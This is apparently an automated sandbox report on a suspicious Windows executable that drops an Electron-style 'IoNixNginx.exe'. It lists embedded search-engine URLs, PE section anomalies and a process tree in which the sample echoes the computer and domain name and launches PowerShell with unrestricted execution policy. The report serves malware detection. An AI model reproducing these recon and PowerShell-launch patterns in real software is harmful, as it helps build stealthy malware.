Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://ve.search.yahoo.com/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://ve.search.yahoo.com/favicon.icohttps://ve.search.yahoo.com/search
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://ve.search.yahoo.com/search
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://ve.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://vn.search.yahoo.com/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://vn.search.yahoo.com/favicon.icohttps://vn.search.yahoo.com/search
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://vn.search.yahoo.com/search
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://vn.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.amd.com/en/support/apu/amd-series-processors/amd-a8-series-apu-for-laptops/a8-5550m-rade
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.ask.com/web?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.baidu.com/#ie=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.baidu.com/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.baidu.com/favicon.icohttps://www.baidu.com/#ie=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.cisco.com/c/en/us/about/legal/privacy-full.html
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.delfi.lt/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.delfi.lt/favicon.icohttps://www.delfi.lt/paieska/?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.delfi.lt/paieska/?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.ecosia.org/newtab/(
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.givero.com/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.givero.com/favicon.icohttps://www.givero.com/search?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.givero.com/search?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.givero.com/suggest?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.info.com/serp?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.info.com/static/www.info.com/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.info.com/static/www.info.com/favicon.icohttps://www.info.com/serp?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.intel.com/content/www/us/en/download-center/home.html
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.nic.cz/odvr/
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.nic.cz/odvr/CZ.NIC
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.privacywall.org/images/favicon_32x32.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.privacywall.org/images/favicon_32x32.icohttps://www.privacywall.org/search/secure/?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.privacywall.org/search/secure/?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.quad9.net/home/privacy/
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF796FED000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF796FED000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.quad9.net/home/privacy/Quad9
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.qwant.com/?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.qwant.com/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.qwant.com/favicon.icohttps://www.qwant.com/?q=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.so.com/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.so.com/favicon.icohttps://www.so.com/s?ie=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.so.com/s?ie=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.sogou.com/images/logo/old/favicon.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.sogou.com/images/logo/old/favicon.icohttps://www.sogou.com/web?ie=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.sogou.com/web?ie=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.yandex.by/chrome/newtab
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.yandex.com.tr/
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.yandex.com.tr/chrome/newtab
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.yandex.kz/chrome/newtab
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.yandex.ua/chrome/newtab
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.by/
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.by/images/search/?rpt=imageview
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.by/images/search/?rpt=imageviewhttps://www.yandex.by/chrome/newtabhttps://storage.ape
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.com.tr/gorsel/search?rpt=imageview
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.com.tr/gorsel/search?rpt=imageviewhttps://www.yandex.com.tr/chrome/newtab
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.com/images/search?rpt=imageview
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.com/search/?text=
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.kz/
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.kz/images/search/?rpt=imageview
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.kz/images/search/?rpt=imageviewhttps://www.yandex.kz/chrome/newtab
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.ua/
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.ua/images/search/?rpt=imageview
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yandex.ua/images/search/?rpt=imageviewhttps://www.yandex.ua/chrome/newtab
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yastatic.net/lego/_/pDu9OWAQKB0s2J9IojKpiS_Eho.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yastatic.net/lego/_/pDu9OWAQKB0s2J9IojKpiS_Eho.icohttps://yandex.by/
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yastatic.net/lego/_/rBTjd6UOPk5913OSn5ZQVYMTQWQ.ico
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF797517000.00000002.00000001.01000000.00000009.sdmp, IoNixNginx.exe, 00000010.00000000.1675720568.00007FF797517000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://yastatic.net/lego/_/rBTjd6UOPk5913OSn5ZQVYMTQWQ.icohttps://yandex.com/search/?text=
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: IoNixNginx.exe, 0000000B.00000000.1631946362.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: RegisterRawInputDevices() failed for RIDEV_REMOVEmemstr_f191d8fd-4

System Summary

barindex
Drops large PE files
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile dump: IoNixNginx.exe.5.dr 160084992Jump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile dump: IoNixNginx.exe0.5.dr 160084992Jump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeProcess token adjusted: SecurityJump to behavior
Source: libEGL.dll0.5.drStatic PE information: Number of sections : 11 > 10
Source: libEGL.dll.5.drStatic PE information: Number of sections : 11 > 10
Source: IoNixNginx.exe.5.drStatic PE information: Number of sections : 15 > 10
Source: vulkan-1.dll0.5.drStatic PE information: Number of sections : 11 > 10
Source: vk_swiftshader.dll.5.drStatic PE information: Number of sections : 11 > 10
Source: IoNixNginx.exe0.5.drStatic PE information: Number of sections : 15 > 10
Source: vk_swiftshader.dll0.5.drStatic PE information: Number of sections : 11 > 10
Source: libGLESv2.dll.5.drStatic PE information: Number of sections : 11 > 10
Source: libGLESv2.dll0.5.drStatic PE information: Number of sections : 11 > 10
Source: vulkan-1.dll.5.drStatic PE information: Number of sections : 11 > 10
Source: AyqwnIUrcz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal56.winEXE@75/167@3/3
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeFile created: C:\Users\user\AppData\Roaming\hgekorcpiasneymcJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5664:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6164:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1840:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6752:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5924:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5464:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3920:120:WilError_03
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsvCD79.tmpJump to behavior
Source: AyqwnIUrcz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: AyqwnIUrcz.exeReversingLabs: Detection: 18%
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile read: C:\Users\user\Desktop\AyqwnIUrcz.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\AyqwnIUrcz.exe "C:\Users\user\Desktop\AyqwnIUrcz.exe"
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeProcess created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe "C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\hgekorcpiasneymc" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1848 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe "C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\hgekorcpiasneymc" --mojo-platform-channel-handle=2184 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
